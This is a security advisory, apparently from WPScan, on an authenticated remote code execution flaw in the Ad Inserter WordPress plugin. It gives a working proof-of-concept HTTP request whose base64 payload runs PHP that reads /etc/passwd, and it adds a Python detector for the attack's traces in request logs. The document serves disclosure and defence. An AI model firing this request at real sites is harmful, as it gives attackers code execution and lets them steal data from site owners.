wpvulndb | Ryan Dewhurst | WPVDB-ID:FBFA36DC-7028-4A31-8A68-4B02DA80290C
History: Jul 15, 2019 - 12:00 a.m.

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

2019-07-15 00:00:00
Ryan Dewhurst
wpscan.com
EPSS: 0.008
Percentile: 81.5%

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability.

PoC

The nonce (ai_check in the final request) can be obtained by querying the homepage with the AI_WP_DEBUGGING cookie set to 2. Then, use an account with a role as low as subscriber to perform the request (payload below in the code parameter is base64 encoded for :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1
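The two requests described in the PoC leave distinct traces (the AI_WP_DEBUGGING=2 cookie, then a post to the ai_ajax_backend action carrying base64 code), so they can be matched in request logs. The following Python is an added example, not part of the original advisory or the plugin's code; the record layout (ip, url, cookie, body), the indicator labels and the sample records are assumptions constructed for illustration, and a log source that records cookies and POST bodies (such as a WAF or reverse proxy) is assumed.

```python
import base64
from urllib.parse import parse_qs, quote, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
def cookies(header):
    """Parse a Cookie header into a dict, tolerating odd characters."""
    return dict(c.strip().split("=", 1) for c in header.split(";") if "=" in c)

def indicators(req):
    """Return the advisory's indicators present in one request record."""
    hits = []
    if cookies(req.get("cookie", "")).get("AI_WP_DEBUGGING") == "2":
        hits.append("debug-cookie")
    url = urlsplit(req["url"])
    # WordPress accepts the AJAX action in the query string or the body.
    params = parse_qs(url.query + "&" + req.get("body", ""))
    if (url.path != AJAX_PATH or "code" not in params
            or params.get("action", [""])[-1] != "ai_ajax_backend"):
        return hits
    hits.append("preview-code")
    if params.get("php", [""])[-1] == "1":
        hits.append("php-flag")
    # parse_qs turns '+' into ' ', so restore it before base64-decoding.
    raw = params["code"][-1].replace(" ", "+")
    try:
        if b"<?" in base64.b64decode(raw + "=" * (-len(raw) % 4)):
            hits.append("php-open-tag")
    except ValueError:
        hits.append("undecodable-code")
    return hits

def suspicious_clients(records):
    """Clients that sent the debug cookie, then posted code to the preview action."""
    primed, flagged = set(), []
    for req in records:
        hits = indicators(req)
        if "debug-cookie" in hits:
            primed.add(req["ip"])
        if "preview-code" in hits and req["ip"] in primed and req["ip"] not in flagged:
            flagged.append(req["ip"])
    return flagged

# Constructed records, not real traffic; field names are assumptions.
_code = quote(base64.b64encode(b"<?php echo 'marker'; ?>").decode())
SAMPLE = [
    {"ip": "192.0.2.10", "url": "/", "cookie": "AI_WP_DEBUGGING=2", "body": ""},
    {"ip": "192.0.2.10", "url": AJAX_PATH, "cookie": "wp_session=x", "body":
     f"action=ai_ajax_backend&preview=1&ai_check=PLACEHOLDER&code={_code}&php=1"},
    {"ip": "192.0.2.20", "url": AJAX_PATH, "cookie": "", "body": "action=heartbeat"},
]
```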
